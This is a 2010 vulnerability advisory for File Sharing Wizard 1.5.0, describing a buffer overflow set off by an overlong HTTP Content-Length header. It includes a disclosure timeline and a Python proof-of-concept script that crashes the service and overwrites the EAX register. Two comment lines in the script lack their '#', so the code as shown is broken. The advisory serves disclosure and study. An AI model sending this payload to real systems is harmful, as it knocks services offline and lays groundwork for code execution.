no one is safe ...

Advisory: File Sharing Wizard - Buffer overflow vulnerability with overwritten EAX CPU register [Update: 20.06.2010]

---------------------------------------------
File Sharing Wizard Version 1.5.0 build on 26-8-2008
- Buffer overflow vulnerability with overwritten EAX CPU register
Date: 15.06.2010
---------------------------------------------

- Description

File Sharing Wizard 1.5: This powerful file sharing software will let you easily share files with your friends or colleagues just through a web browser (IE, Mozilla, FireFox etc). Using File Sharing Wizard will turn your pc into web server in seconds.

- buffer overflow vulnerability

The vulnerability can be triggered by sending a specially crafted HTTP GET request. Payload of the attached POC overwrites the EAX register with B.

- Solution

No known solution available.

- Credits

The vulnerability was discovered by Michael Messner from Integralis
michael#dot#messner#at#integralis#dot#com

- Timeline

25.05.2010 - vulnerability discovered
25.05.2010 - contacted support team of sharing-file.net
15.06.2010 - no response from the support team
15.06.2010 - public disclosure

- Reference

Download vulnerable software
http://www.sharing-file.net/
http://www.sharing-file.net/file-sharing/download/fs-wizard-setup.exe

- Screenshot


- more Ressources:

- POC

#!/usr/bin/python

# http://www.sharing-file.net/
#
File Sharing Wizard Version 1.5.0 build on 26-8-2008
#
# controlling EAX
# ESP points to our buffer
# buffer grows if we increase our string
#
# more details on http://www.s3cur1ty.de
#
have fun m1k3 [at] m1k3 [dot] at

import socket
import sys

if len(sys.argv) < 2:
        print "Usage: vrfy.py <IP-Adr> <port>"
        sys.exit(1)

ips = sys.argv[1]
port = int(sys.argv[2])

string = "A"*51
string += "B"*4         #controlling eax
string += "C"*500

header = "Content-Length"

print "starting the attack for:", ips
print ""

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
        connect=s.connect((ips, port))
except:
        print "no connection possible"
        sys.exit(1)

print "\r\nsending payload"
print "..."
payload = (
'GET http://%s/ HTTP/1.0\r\n'
'%s: %s\r\n'
'\r\n') % (ips,header,string)

s.send(payload)
s.close()

print "finished kicking device %s" % (ips)
print "... the service should be crashed ... check eax"

AttachmentSize
advisory-file-sharing-wizard.txt2.21 KB